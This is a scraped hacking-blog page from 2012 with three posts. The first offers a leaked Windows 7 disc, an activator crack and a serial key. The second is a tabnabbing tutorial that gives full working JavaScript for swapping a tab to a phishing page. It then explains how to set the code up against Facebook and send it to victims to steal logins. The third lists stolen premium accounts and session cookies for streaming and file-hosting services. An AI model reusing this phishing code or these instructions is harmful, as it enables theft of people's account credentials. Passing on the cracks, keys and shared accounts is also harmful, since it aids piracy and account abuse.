Rabu, 05 September 2012

egyhacks.net

egyhacks.net


Microsoft Windows 7 Ultimate Full Download (Sep 2012)

Posted: 04 Sep 2012 10:55 PM PDT



Microsoft Windows 7 Ultimate Full Download sep 2012


Hi all users, here is leaked retail DVD of Microsoft Windows 7 Ultimate with included SP1 – available in 32 & 64bit. There is also provided Windows 7 Activator 1.9.5 by DAZ which is compatible with SP1. Windows 7 and Windows Server 2008 R2 SP1 helps keep your PCs and servers on the latest support level, provides ongoing improvements to the Windows Operating System (OS), includes previous updates delivered over Windows Update and incremental updates to the Windows 7 and Windows Server 2008 R2 platforms based on customer and partner feedback, and is easy for organizations to deploy a single set of updates.

Serial Number

6JKV2-QPB8H-RQ893-FW7TM-PBJ73




Enjoy.......

Note :- Kindly g+1 this post if you want more updates like this.

What Is Tabnabbing Attack And How Does It Work ?

Posted: 04 Sep 2012 09:19 PM PDT



What Is Tabnabbing Attack And How Does It Work ?


Hi all users, today we'll teach you what is Advanced Tabnabbing Attack and how to hack emails, website and social networking website's login information by using this attack. I know most of them don't know what this exactly is and how it works, the is why I'll explain this tutorial using attack scenario and example and also teach you how to protect yourself from such stuff.  So lets get started.

1. First of all a hacker, customizes current webpage by adding some new parameters and variables. (check the code below for details).

2. Then sends a copy of this web page to victim whose account or whatever he want to hack. 

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of javaScript. 

4. The user will be able to browse the website like the original one, e.g. he can press forward backward button and can navigate through pages. 

5. Now if victim left the new webpage open for certain period of time (5-10 sec), the tab or website will be changed to Phishing Page(fake page) which will look absolutely similarly to original one. 

6. Now when user enters his/her credentials (user and pass), he is entering that info in Fake page and got trapped in hacker's trap that hacker have laid down to hack him. Here ends the attack scenario for advanced tabnabbing.

Note :- This tutorial is only for Educational Purposes, we're not encouraging any kind of hacking activity here, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so. 

Before coding Part lets me first share the tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing. Follow below measure to protect yourself from Tabnabbing : 

1. Always use anti-javaScript plugin's in your web browser that stops execution of malicious javaScripts. For example: Noscript for Firefox or NoScripts for chrome etc. 

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar. 

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's. 

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks. 

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious. Here ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff.. 

Note :- Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level. First sample code for doing tabnabbing with the help of the code given below.


<html>

<head><title></title></head>
    <style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://ashutoshthehacker.blogspot.in"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "The Next Generation"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://ashutoshthehacker.blogspot.in/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE; //Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html> 


Now what you need to replace in this code to make it working say for Facebook : 

1. REAL_PAGE_URL : www.facebook.com 
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More 
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL 
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More 
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note : Its better to upload the facebook favicon, it will make it more look-alike) 
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes. 
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch. 
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page. 

Now as I have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).  That's all

Enjoy.......

Note :- Kindly g+1 this post if you like it.

All Premium Account That You Need !!!

Posted: 04 Sep 2012 08:50 PM PDT


All Premium Account That You Need

 Mega Premium Accounts 04509/2012
05 Sep 2012


Uploadhero Premium Cookie - 5th September 2012 5/9/2012 9/5/2012

Filehost Premium Account - 5th September 2012 5/9/2012 9/5/2012

2X Warnertv.com Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

GIGABASE Premium Account - 5th September 2012 5/9/2012 9/5/2012

Minecraft Premium Account - 5th September 2012 5/9/2012 9/5/2012

3X Rapidshare Premium Cookies - 5th September 2012 5/9/2012 9/5/2012

10X Rapidshare Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

4X Zevera Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

Zevera Premium Cookie - 5th September 2012 5/9/2012 9/5/2012

Nba Premium Account - 5th September 2012 5/9/2012 9/5/2012

4X HULU Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

CROCKO Premium Account - 5th September 2012 5/9/2012 9/5/2012

3X SHARE-RAPID Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

2X Uloz.to Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

GIGANEWS Premium Account - 5th September 2012 5/9/2012 9/5/2012

2X Usenext Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

14X Netflix Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

13X Filefactory Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

91X Filefactory Premium Cookies - 5th September 2012 5/9/2012 9/5/2012

6X Filevelocity Premium JavaScript - 5th September 2012 5/9/2012 9/5/2012

5X Filevelocity Premium Accounts - 5th September 2012 5/9/2012 9/5/2012

10X Filevelocity Premium Cookies - 5th September 2012 5/9/2012 9/5/2012

4X Rapidgator Premium JavaScript - 5th September 2012 5/9/2012 9/5/2012

97X Rapidgator Premium Cookies - 5th September 2012 5/9/2012 9/5/2012



Skip Ads to Download

Note :- Kindly g+1 this post to get more updates.

You may also like :

Tidak ada komentar:

Posting Komentar